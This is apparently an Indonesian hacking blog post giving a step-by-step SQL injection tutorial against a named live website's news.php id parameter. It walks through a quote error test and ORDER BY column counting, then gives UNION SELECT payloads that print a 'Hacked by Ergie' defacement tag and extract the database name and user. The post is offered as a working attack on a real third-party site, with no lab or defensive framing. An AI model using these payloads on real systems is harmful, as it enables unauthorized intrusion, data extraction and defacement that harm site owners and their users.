Hi semuanyaa kali ini kami bakal memberi sedikit ilmu yang mudah dikembangkan dan sudah biasa di dunia hacking
Oke langsung aja
1.live target: http://kansascitynova.org/news.php?id=38
2.DIOS
3.KOPI
pertama tambahkan tanda ' sesudah angka 38 seperti ini
http://kansascitynova.org/news.php?id=38'
jika error mysql atau blank page berarti vuln oke langsung
Tambahkan +ORDER+BY+1--+ setelah tanda ' begini
http://kansascitynova.org/news.php?id=38'+ORDER+BY+1--+ (normal)
http://kansascitynova.org/news.php?id=38'+ORDER+BY+2--+ (normal)
http://kansascitynova.org/news.php?id=38'+ORDER+BY+3--+ (normal)
http://kansascitynova.org/news.php?id=38'+ORDER+BY+4--+ (normal)
http://kansascitynova.org/news.php?id=38'+ORDER+BY+5--+ (normal)
http://kansascitynova.org/news.php?id=38'+ORDER+BY+6--+ (normal)
http://kansascitynova.org/news.php?id=38'+ORDER+BY+7--+ (normal)
http://kansascitynova.org/news.php?id=38'+ORDER+BY+8--+ (error)
Oke di order by 8 error berarti Normal nya sampe 7 kita lanjut ke
+UNION+SELECT+1,2,3,4,5,6,7--+
http://kansascitynova.org/news.php?id=38'+UNION+SELECT+1,2,3,4,5,6,7--+
Coba buka nah ada angka" di pagenya angka 2,5,dan 6 itu bisa kita sebut angka emas,angka ajaib,nomor togel:v.dia angka tadi kita coba print nickname kita..
http://kansascitynova.org/news.php?id=38'+UNION+SELECT+1,'Hacked by Ergie',3,4,database(),user(),7--+
> Penjelasan
'Hacked by Ergie' = untuk memprint nickname
database() = melihat nama database
user() = Melihat username
Yang kita ubah hanya angka yang muncul pada page website.
0 Komentar